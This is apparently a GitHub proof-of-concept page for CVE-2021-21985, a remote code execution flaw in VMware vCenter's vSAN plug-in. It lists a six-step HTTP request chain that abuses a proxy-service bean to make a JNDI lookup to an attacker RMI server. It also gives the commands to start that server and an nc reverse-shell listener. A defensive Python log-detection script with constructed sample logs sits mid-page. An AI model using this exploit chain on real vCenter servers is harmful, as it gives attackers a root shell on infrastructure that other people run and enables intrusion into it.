
CVE-2021-21985 PoC — VMware vSphere Client input validation vulnerability

Source
Associated Vulnerability
Title: VMware vSphere Client input validation vulnerability (CVE-2021-21985)
Description: VMware vSphere Client is an application from the US company VMware that provides virtualization management. VMware vSphere Client has an input validation vulnerability: because the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server, lacks input validation, an attacker can execute commands with unrestricted privileges on the underlying operating system.
Description
cve-2021-21985 exploit
Readme
# cve-2021-21985 exploit

## 0x01 Vulnerable point

![image-20210603144442312](README.assets/image-20210603144442312.png)

Analysis can be found at:

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

## 0x02 exploit

Reconstruct the bean objects to achieve RCE.

Bean list:

```
localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService
```

The vsanProviderUtils_setVmodlHelper bean that 随风大佬 used did not work in my environment, so I tested with a different bean. Since vSphere UI runs on the Tomcat middleware, commands can be executed remotely through a JNDI RMI bypass (https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java).

```
Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}
```
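From the defender's side, the six-step chain above leaves a very recognisable trace in the vSphere UI access log: a burst of requests from one client to `/ui/h5-vsan/rest/proxy/service/<bean>/<method>` walking through `setTargetObject`, `setStaticMethod`, `setTargetMethod`, `setArguments`, `prepare` and `invoke`. The following Python detector is an added example, not part of this repository or VMware's tooling. It parses constructed access-log lines in an assumed Apache/Tomcat combined layout (client IP first, then the quoted request line and status), groups proxy-service hits per source, and rates a source "high" when it completes the full ordered method sequence and "medium" on any other hit. The bean names and endpoint prefix come straight from this README; the log lines and IP addresses are constructed samples.

```python
import re
from collections import defaultdict

# Endpoint prefix and method sequence as used in the request chain above.
PROXY_PREFIX = "/ui/h5-vsan/rest/proxy/service/"
CHAIN_METHODS = ("setTargetObject", "setStaticMethod", "setTargetMethod",
                 "setArguments", "prepare", "invoke")

# Bean list from section 0x02 of this README.
KNOWN_BEANS = frozenset([
    "localizedMessageBundle", "vsanWorkerThreadFactory", "vsanThreadPoolImpl",
    "vsanServiceBundleActivator", "vsanServiceFactory",
    "vsanProviderUtils_setVmodlHelper", "vsanProviderUtils_setVsanServiceFactory",
    "vsanQueryUtil_setDataService", "vsanComponentsProviderImpl",
    "capabilityPropertyProviderImpl", "pbmDataProviderImpl",
    "vsanCapabilityCacheManager", "vsanCapabilityUtils_setVsanCapabilityCacheManager",
    "vsanUtils_setMessageBundle", "vsanFormatUtils_setUserSessionService",
])

# Assumed combined access-log layout: client ip, ident, user, [timestamp],
# "METHOD path protocol", status. Adjust the pattern if your log format differs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_path(path):
    """Return (bean, method) when the path targets the vSAN proxy service, else None."""
    if not path.startswith(PROXY_PREFIX):
        return None
    rest = path[len(PROXY_PREFIX):].split("?", 1)[0]
    bean, _, method = rest.partition("/")
    # The chain in this README prefixes the bean name with '&'; strip it for matching.
    return bean.lstrip("&"), method


def detect(lines):
    """Group proxy-service hits per source IP and flag the ordered method chain."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify_path(rec["path"])
        if hit is not None:
            seen[rec["src"]].append(hit)

    alerts = []
    for src, hits in seen.items():
        # Count how far through CHAIN_METHODS this source progressed, in order.
        step = 0
        for _, method in hits:
            if step < len(CHAIN_METHODS) and method == CHAIN_METHODS[step]:
                step += 1
        complete = step == len(CHAIN_METHODS)
        alerts.append({
            "src": src,
            "beans": sorted({b for b, _ in hits}),
            "known_bean": any(b in KNOWN_BEANS for b, _ in hits),
            "steps_matched": step,
            "complete_chain": complete,
            "severity": "high" if complete else "medium",
        })
    return alerts


# Constructed sample log: one source runs the whole chain, another only the first step.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jun/2021:20:12:30 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject HTTP/1.1" 200 16
203.0.113.5 - - [03/Jun/2021:20:12:31 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod HTTP/1.1" 200 16
203.0.113.5 - - [03/Jun/2021:20:12:32 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod HTTP/1.1" 200 16
203.0.113.5 - - [03/Jun/2021:20:12:33 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments HTTP/1.1" 200 16
203.0.113.5 - - [03/Jun/2021:20:12:34 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare HTTP/1.1" 200 16
203.0.113.5 - - [03/Jun/2021:20:12:35 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke HTTP/1.1" 200 16
198.51.100.9 - - [03/Jun/2021:20:13:00 +0000] "POST /ui/h5-vsan/rest/proxy/service/&vsanServiceFactory/setTargetObject HTTP/1.1" 200 16
198.51.100.9 - - [03/Jun/2021:20:13:05 +0000] "GET /ui/login HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Any request to the proxy-service endpoint is worth an alert on its own, because the endpoint is reachable without authentication and legitimate vSAN UI traffic does not call `prepare`/`invoke` in this fashion; the ordered-chain score only separates a completed invocation from a probe.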

## 0x03 Usage

1. Start the RMI server
   ```
   java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
   ```
   ![image-20210603201234855](README.assets/image-20210603201234855.png)
2. Start the reverse shell listener
   ```
   nc -lvvp 5555
   ```
3. Send the payloads above and receive the reverse shell
   ![image-20210603201337539](README.assets/image-20210603201337539.png)

## 0x04 References
* https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/
* https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis
* https://github.com/welk1n/JNDI-Injection-Bypass
File Snapshot

```
[4.0K] /data/pocs/da1810f019615ad3a51e4829fe3decaaed2143e2
├── [2.4K] cve-2021-21985.py
├── [7.7M] JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar
├── [4.0K] README.assets
│   ├── [785K] image-20210603144442312.png
│   ├── [ 21K] image-20210603201234855.png
│   └── [315K] image-20210603201337539.png
└── [2.4K] README.md

1 directory, 6 files
```